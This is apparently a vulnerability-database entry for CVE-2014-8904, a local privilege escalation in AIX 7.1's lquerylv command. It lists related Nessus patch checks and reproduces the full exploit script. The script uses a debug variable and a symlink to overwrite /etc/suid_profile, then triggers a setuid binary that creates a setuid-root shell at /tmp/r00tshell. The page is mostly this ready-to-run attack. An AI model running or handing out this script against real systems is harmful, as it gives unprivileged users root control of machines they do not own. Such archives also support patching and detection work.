AIX 7.1 - 'lquerylv' Local Privilege Escalation

🗓️ 30 Oct 2015 00:00:00Reported by S2 CrewType

AIX 7.1 lquerylv privilege escalation CVE-2014-890

Reporter	Title	Published	Views	Family All 19
0day.today	AIX 7.1 - lquerylv Local Privilege Escalation Vulnerability	30 Oct 201500:00	–	zdt
Tenable Nessus	AIX 6.1 TL 9 : lvm (IV67907)	2 Feb 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 3 : lvm (IV67908)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 5.3 TL 12 : lvm (IV68070)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 8 : lvm (IV68082)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 9 : lvm (IV68099) (deprecated)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 2 : lvm (IV68478)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 3 : bos.rte.lvm (U865854)	29 May 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 9 : bos.rte.lvm (U865862)	29 May 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 2 : bos.rte.lvm (U867549)	30 Sep 201500:00	–	nessus

#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: - 
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;) 
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv

cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF

/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell

30 Oct 2015 00:00Current

6.4Medium risk

Vulners AI Score6.4

CVSS 27.2

EPSS0.0056

AIX 7.1 - &#039;lquerylv&#039; Local Privilege Escalation

AIX 7.1 - 'lquerylv' Local Privilege Escalation